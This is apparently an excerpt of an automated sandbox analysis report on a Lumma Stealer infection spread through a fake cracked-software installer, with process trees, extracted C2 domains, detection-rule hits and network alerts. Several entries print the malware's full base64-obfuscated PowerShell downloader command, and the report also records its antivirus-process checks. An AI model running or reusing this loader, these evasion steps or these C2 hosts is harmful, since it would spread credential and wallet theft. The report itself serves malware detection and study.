      • tasklist.exe (PID: 3348 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6616 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3816 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2532 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5484 cmdline: cmd /c md 650429 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 1036 cmdline: cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Palestine.com (PID: 6148 cmdline: Palestine.com D MD5: 62D09F076E6E0240548C2F837536A46A)
        • V2DDYDPIWYUTCJYUB0IV5.exe (PID: 6540 cmdline: "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" MD5: 0EFDBBF3F5074D596D3E61446B623942)
          • V2DDYDPIWYUTCJYUB0IV5.tmp (PID: 3424 cmdline: "C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$6036C,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" MD5: D8F3F93349755C2BD326DF91966FD6F5)
            • V2DDYDPIWYUTCJYUB0IV5.exe (PID: 3940 cmdline: "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT MD5: 0EFDBBF3F5074D596D3E61446B623942)
              • V2DDYDPIWYUTCJYUB0IV5.tmp (PID: 816 cmdline: "C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$80362,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT MD5: D8F3F93349755C2BD326DF91966FD6F5)
      • choice.exe (PID: 1360 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["necklacebudi.lat", "aspecteirs.lat", "sustainskelet.lat", "shearhoaxx.click", "grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "rapeflowwj.lat", "discokeyus.lat"], "Build id": "Ol1wEfA--w"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000027.00000002.2156116548.000000000974A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        Process Memory Space: Palestine.com PID: 6176JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: Palestine.com PID: 6176JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Palestine.com PID: 6148JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: Palestine.com PID: 6148JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                amsi32_4540.amsi.csvSUSP_Obfuscted_PowerShell_CodeDetects obfuscated PowerShell CodeFlorian Roth
                • 0xb1f6:$s1: ').Invoke(
                • 0xb2c3:$s1: ').Invoke(
                • 0xb39b:$s1: ').Invoke(
                • 0xb3c4:$s1: ').Invoke(
                • 0xb41b:$s1: ').Invoke(
                • 0xb544:$s1: ').Invoke(
                • 0xb5cf:$s1: ').Invoke(
                • 0xb614:$s1: ').Invoke(
                • 0xb701:$s1: ').Invoke(
                • 0xb77a:$s1: ').Invoke(
                • 0xb7ce:$s1: ').Invoke(
                • 0xb7fd:$s1: ').Invoke(
                • 0xc564:$s1: ').Invoke(
                • 0xc631:$s1: ').Invoke(
                • 0xc709:$s1: ').Invoke(
                • 0xc732:$s1: ').Invoke(
                • 0xc789:$s1: ').Invoke(
                • 0xc8b2:$s1: ').Invoke(
                • 0xc93d:$s1: ').Invoke(
                • 0xc982:$s1: ').Invoke(
                • 0xca6f:$s1: ').Invoke(

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJwBFAF0AKAA2AFMAdgB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADEAfQA2AFMAdgAtAEYAbABUAFYAZQBsAFQAVgAsAGwAVAAnACsAJwBWAEkATgBsAFQAVgAsAGwAVABWAFMAeQAnACsAJwBTAFQAbABUAFYALABsAFQAVgBtAC4AaQBvAGwAVABWACwAbABUAFYALgBTAGUARQBLAG8AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJwArACcASQBsAFQAJwArACcAVgApACAAIAApACAAOwAgAHMAVgAgAGMAZwAwACcAKwAnAHEAIAAoACAAWwB0AFkAUABlAF0AKAA2AFMAdgB7ADMAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQA2AFMAdgAgAC0ARgBsAFQAVgB0AGUATQAuAGkATwAnACsAJwBsAFQAVgAsAGwAVABWAC4AUABsAFQAVgAsAGwAVABWAGgAbABUAFYALABsAFQAVgBTAFkAUwBsAFQAVgAsAGwAVABWAEEAVAAnACsAJwBsAFQAVgApACkAJwArACcAIAA7ACAAUwBlAHQALQBWAGEAcgBpACcAKwAnAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB1AEIAMgBnAHQAIAAtAFYAYQBsAHUAZQAgACgAWwBUAFkAUABlAF0AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEUAbQAuAEkAJwArACcATwAuAEYAbABUAFYALABsAFQAVgBTAHkAbABUAFYALABsAFQAVgBTAFQAbABUAFYALABsAFQAVgBJAEwARQBsAFQAVgApACkAIAAgADsAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAHMAYwBSAEkAUABUAEIATABPAEMAawAgAC0AVgBhAGwAdQBlACAAKAB7AAoAIAAnACsAJwAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFoASQBQAFUAUgBsACAALQBWAGEAbAB1AGUAIAAoADYAUwB2AHsAMwB9AHsANwB9AHsANgB9AHsANAB9AHsAOQB9AHsAMQB9AHsAMQAwAH0AewA4AH0AewAwAH0AewA1AH0AewAyAH0ANgBTAHYAIAAtAGYAbABUAFYAdABsACcAKwAnAFQAVgAsAGwAVABWAHAALwBsACcAKwAnAFQAVgAsAGwAVABWAHQAeAB0AGwAVABWACwAbABUAFYAaAB0AGwAVABWACwAbABUAFYAaQBwAHQAZQBkAGUAbABUAFYALABsAFQAVgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwBFAEIAYwBsAEkARQBOAHQAIAAtAFYAYQBsAHUAZQAgACgALgAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ADYAUwB2ACAALQBmAGwAVABWAGoAZQBjAHQAbABUAFYALABsAFQAVgBOAGUAdwBsAFQAVgAsAGwAVABWAC0ATwBiAGwAVABWACkAIAAoADYAUwB2AHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ADYAUwB2AC0AZgAgAGwAVABWAGUAdAAuAFcAbABUAFYALABsAFQAVgBTAHkAcwAnACsAJwB0AGUAbQAuAE4AbABUAFYALABsAFQAVgBlAGwAVABWACwAbABUAFYAJwArACcAYgBDAGwAaQBlAG4AdABsAFQAVgApACkACgAnACsAJwAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAJwArACcAbABlACAALQBOAGEAbQBlACAAWgBpAFAAZABhAHQAQQAgAC0AVgBhAGwAdQBlACcAKwAnACAAKABEAHkARQB7AHcAZQBCAFUAbQBCAEMATABCAFUAbQBJAEUAbgBUAH0ALgAoADYAUwB2AHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ADYAUwB2ACAALQBmAGwAVABWAGEAdABsAFQAVgAsAGwAVABWAGEAZABEAGwAVABWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAEQAbwB3AG4AbABvAGwAVABWACkALgBJAG4AdgBvAGsAZQAoACcAKwAnAEQAeQBFAHsAegBCAFUAbQBJAFAAQgBVAG0AVQByAGwAfQApACcAKwAnACkACgAKACAAIAAnACsAJwAgACAAUwBlAHQALQBWAGEAcgBp
                Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJwBFAF0AKAA2AFMAdgB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADEAfQA2AFMAdgAtAEYAbABUAFYAZQBsAFQAVgAsAGwAVAAnACsAJwBWAEkATgBsAFQAVgAsAGwAVABWAFMAeQAnACsAJwBTAFQAbABUAFYALABsAFQAVgBtAC4AaQBvAGwAVABWACwAbABUAFYALgBTAGUARQBLAG8AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJwArACcASQBsAFQAJwArACcAVgApACAAIAApACAAOwAgAHMAVgAgAGMAZwAwACcAKwAnAHEAIAAoACAAWwB0AFkAUABlAF0AKAA2AFMAdgB7ADMAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQA2AFMAdgAgAC0ARgBsAFQAVgB0AGUATQAuAGkATwAnACsAJwBsAFQAVgAsAGwAVABWAC4AUABsAFQAVgAsAGwAVABWAGgAbABUAFYALABsAFQAVgBTAFkAUwBsAFQAVgAsAGwAVABWAEEAVAAnACsAJwBsAFQAVgApACkAJwArACcAIAA7ACAAUwBlAHQALQBWAGEAcgBpACcAKwAnAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB1AEIAMgBnAHQAIAAtAFYAYQBsAHUAZQAgACgAWwBUAFkAUABlAF0AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEUAbQAuAEkAJwArACcATwAuAEYAbABUAFYALABsAFQAVgBTAHkAbABUAFYALABsAFQAVgBTAFQAbABUAFYALABsAFQAVgBJAEwARQBsAFQAVgApACkAIAAgADsAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAHMAYwBSAEkAUABUAEIATABPAEMAawAgAC0AVgBhAGwAdQBlACAAKAB7AAoAIAAnACsAJwAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFoASQBQAFUAUgBsACAALQBWAGEAbAB1AGUAIAAoADYAUwB2AHsAMwB9AHsANwB9AHsANgB9AHsANAB9AHsAOQB9AHsAMQB9AHsAMQAwAH0AewA4AH0AewAwAH0AewA1AH0AewAyAH0ANgBTAHYAIAAtAGYAbABUAFYAdABsACcAKwAnAFQAVgAsAGwAVABWAHAALwBsACcAKwAnAFQAVgAsAGwAVABWAHQAeAB0AGwAVABWACwAbABUAFYAaAB0AGwAVABWACwAbABUAFYAaQBwAHQAZQBkAGUAbABUAFYALABsAFQAVgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwBFAEIAYwBsAEkARQBOAHQAIAAtAFYAYQBsAHUAZQAgACgALgAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ADYAUwB2ACAALQBmAGwAVABWAGoAZQBjAHQAbABUAFYALABsAFQAVgBOAGUAdwBsAFQAVgAsAGwAVABWAC0ATwBiAGwAVABWACkAIAAoADYAUwB2AHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ADYAUwB2AC0AZgAgAGwAVABWAGUAdAAuAFcAbABUAFYALABsAFQAVgBTAHkAcwAnACsAJwB0AGUAbQAuAE4AbABUAFYALABsAFQAVgBlAGwAVABWACwAbABUAFYAJwArACcAYgBDAGwAaQBlAG4AdABsAFQAVgApACkACgAnACsAJwAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAJwArACcAbABlACAALQBOAGEAbQBlACAAWgBpAFAAZABhAHQAQQAgAC0AVgBhAGwAdQBlACcAKwAnACAAKABEAHkARQB7AHcAZQBCAFUAbQBCAEMATABCAFUAbQBJAEUAbgBUAH0ALgAoADYAUwB2AHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ADYAUwB2ACAALQBmAGwAVABWAGEAdABsAFQAVgAsAGwAVABWAGEAZABEAGwAVABWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAEQAbwB3AG4AbABvAGwAVABWACkALgBJAG4AdgBvAGsAZQAoACcAKwAnAEQAeQBFAHsAegBCAFUAbQBJAFAAQgBVAG0AVQByAGwAfQApACcAKwAnACkACgAKACAAIAAnACsAJwAgACAAUwBlAHQALQBWAGEAcgBp
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4540, TargetFilename: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Data.Entity.Design.dll
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe", ParentImage: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe, ParentProcessId: 7144, ParentProcessName: acronis recovery expert deluxe 1.0.0.132.rarl.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd, ProcessId: 6272, ProcessName: cmd.exe
                Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJwBFAF0AKAA2AFMAdgB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADEAfQA2AFMAdgAtAEYAbABUAFYAZQBsAFQAVgAsAGwAVAAnACsAJwBWAEkATgBsAFQAVgAsAGwAVABWAFMAeQAnACsAJwBTAFQAbABUAFYALABsAFQAVgBtAC4AaQBvAGwAVABWACwAbABUAFYALgBTAGUARQBLAG8AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJwArACcASQBsAFQAJwArACcAVgApACAAIAApACAAOwAgAHMAVgAgAGMAZwAwACcAKwAnAHEAIAAoACAAWwB0AFkAUABlAF0AKAA2AFMAdgB7ADMAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQA2AFMAdgAgAC0ARgBsAFQAVgB0AGUATQAuAGkATwAnACsAJwBsAFQAVgAsAGwAVABWAC4AUABsAFQAVgAsAGwAVABWAGgAbABUAFYALABsAFQAVgBTAFkAUwBsAFQAVgAsAGwAVABWAEEAVAAnACsAJwBsAFQAVgApACkAJwArACcAIAA7ACAAUwBlAHQALQBWAGEAcgBpACcAKwAnAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB1AEIAMgBnAHQAIAAtAFYAYQBsAHUAZQAgACgAWwBUAFkAUABlAF0AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEUAbQAuAEkAJwArACcATwAuAEYAbABUAFYALABsAFQAVgBTAHkAbABUAFYALABsAFQAVgBTAFQAbABUAFYALABsAFQAVgBJAEwARQBsAFQAVgApACkAIAAgADsAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAHMAYwBSAEkAUABUAEIATABPAEMAawAgAC0AVgBhAGwAdQBlACAAKAB7AAoAIAAnACsAJwAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFoASQBQAFUAUgBsACAALQBWAGEAbAB1AGUAIAAoADYAUwB2AHsAMwB9AHsANwB9AHsANgB9AHsANAB9AHsAOQB9AHsAMQB9AHsAMQAwAH0AewA4AH0AewAwAH0AewA1AH0AewAyAH0ANgBTAHYAIAAtAGYAbABUAFYAdABsACcAKwAnAFQAVgAsAGwAVABWAHAALwBsACcAKwAnAFQAVgAsAGwAVABWAHQAeAB0AGwAVABWACwAbABUAFYAaAB0AGwAVABWACwAbABUAFYAaQBwAHQAZQBkAGUAbABUAFYALABsAFQAVgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwBFAEIAYwBsAEkARQBOAHQAIAAtAFYAYQBsAHUAZQAgACgALgAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ADYAUwB2ACAALQBmAGwAVABWAGoAZQBjAHQAbABUAFYALABsAFQAVgBOAGUAdwBsAFQAVgAsAGwAVABWAC0ATwBiAGwAVABWACkAIAAoADYAUwB2AHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ADYAUwB2AC0AZgAgAGwAVABWAGUAdAAuAFcAbABUAFYALABsAFQAVgBTAHkAcwAnACsAJwB0AGUAbQAuAE4AbABUAFYALABsAFQAVgBlAGwAVABWACwAbABUAFYAJwArACcAYgBDAGwAaQBlAG4AdABsAFQAVgApACkACgAnACsAJwAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAJwArACcAbABlACAALQBOAGEAbQBlACAAWgBpAFAAZABhAHQAQQAgAC0AVgBhAGwAdQBlACcAKwAnACAAKABEAHkARQB7AHcAZQBCAFUAbQBCAEMATABCAFUAbQBJAEUAbgBUAH0ALgAoADYAUwB2AHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ADYAUwB2ACAALQBmAGwAVABWAGEAdABsAFQAVgAsAGwAVABWAGEAZABEAGwAVABWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAEQAbwB3AG4AbABvAGwAVABWACkALgBJAG4AdgBvAGsAZQAoACcAKwAnAEQAeQBFAHsAegBCAFUAbQBJAFAAQgBVAG0AVQByAGwAfQApACcAKwAnACkACgAKACAAIAAnACsAJwAgACAAUwBlAHQALQBWAGEAcgBp
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJwBFAF0AKAA2AFMAdgB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADEAfQA2AFMAdgAtAEYAbABUAFYAZQBsAFQAVgAsAGwAVAAnACsAJwBWAEkATgBsAFQAVgAsAGwAVABWAFMAeQAnACsAJwBTAFQAbABUAFYALABsAFQAVgBtAC4AaQBvAGwAVABWACwAbABUAFYALgBTAGUARQBLAG8AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJwArACcASQBsAFQAJwArACcAVgApACAAIAApACAAOwAgAHMAVgAgAGMAZwAwACcAKwAnAHEAIAAoACAAWwB0AFkAUABlAF0AKAA2AFMAdgB7ADMAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQA2AFMAdgAgAC0ARgBsAFQAVgB0AGUATQAuAGkATwAnACsAJwBsAFQAVgAsAGwAVABWAC4AUABsAFQAVgAsAGwAVABWAGgAbABUAFYALABsAFQAVgBTAFkAUwBsAFQAVgAsAGwAVABWAEEAVAAnACsAJwBsAFQAVgApACkAJwArACcAIAA7ACAAUwBlAHQALQBWAGEAcgBpACcAKwAnAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB1AEIAMgBnAHQAIAAtAFYAYQBsAHUAZQAgACgAWwBUAFkAUABlAF0AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEUAbQAuAEkAJwArACcATwAuAEYAbABUAFYALABsAFQAVgBTAHkAbABUAFYALABsAFQAVgBTAFQAbABUAFYALABsAFQAVgBJAEwARQBsAFQAVgApACkAIAAgADsAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAHMAYwBSAEkAUABUAEIATABPAEMAawAgAC0AVgBhAGwAdQBlACAAKAB7AAoAIAAnACsAJwAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFoASQBQAFUAUgBsACAALQBWAGEAbAB1AGUAIAAoADYAUwB2AHsAMwB9AHsANwB9AHsANgB9AHsANAB9AHsAOQB9AHsAMQB9AHsAMQAwAH0AewA4AH0AewAwAH0AewA1AH0AewAyAH0ANgBTAHYAIAAtAGYAbABUAFYAdABsACcAKwAnAFQAVgAsAGwAVABWAHAALwBsACcAKwAnAFQAVgAsAGwAVABWAHQAeAB0AGwAVABWACwAbABUAFYAaAB0AGwAVABWACwAbABUAFYAaQBwAHQAZQBkAGUAbABUAFYALABsAFQAVgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwBFAEIAYwBsAEkARQBOAHQAIAAtAFYAYQBsAHUAZQAgACgALgAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ADYAUwB2ACAALQBmAGwAVABWAGoAZQBjAHQAbABUAFYALABsAFQAVgBOAGUAdwBsAFQAVgAsAGwAVABWAC0ATwBiAGwAVABWACkAIAAoADYAUwB2AHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ADYAUwB2AC0AZgAgAGwAVABWAGUAdAAuAFcAbABUAFYALABsAFQAVgBTAHkAcwAnACsAJwB0AGUAbQAuAE4AbABUAFYALABsAFQAVgBlAGwAVABWACwAbABUAFYAJwArACcAYgBDAGwAaQBlAG4AdABsAFQAVgApACkACgAnACsAJwAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAJwArACcAbABlACAALQBOAGEAbQBlACAAWgBpAFAAZABhAHQAQQAgAC0AVgBhAGwAdQBlACcAKwAnACAAKABEAHkARQB7AHcAZQBCAFUAbQBCAEMATABCAFUAbQBJAEUAbgBUAH0ALgAoADYAUwB2AHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ADYAUwB2ACAALQBmAGwAVABWAGEAdABsAFQAVgAsAGwAVABWAGEAZABEAGwAVABWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAEQAbwB3AG4AbABvAGwAVABWACkALgBJAG4AdgBvAGsAZQAoACcAKwAnAEQAeQBFAHsAegBCAFUAbQBJAFAAQgBVAG0AVQByAGwAfQApACcAKwAnACkACgAKACAAIAAnACsAJwAgACAAUwBlAHQALQBWAGEAcgBp

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6272, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 4692, ProcessName: findstr.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T10:35:29.900273+010020283713Unknown Traffic192.168.2.1649701172.67.129.49443TCP
                2024-12-23T10:35:31.902946+010020283713Unknown Traffic192.168.2.1649702172.67.129.49443TCP
                2024-12-23T10:35:34.403283+010020283713Unknown Traffic192.168.2.1649703172.67.129.49443TCP
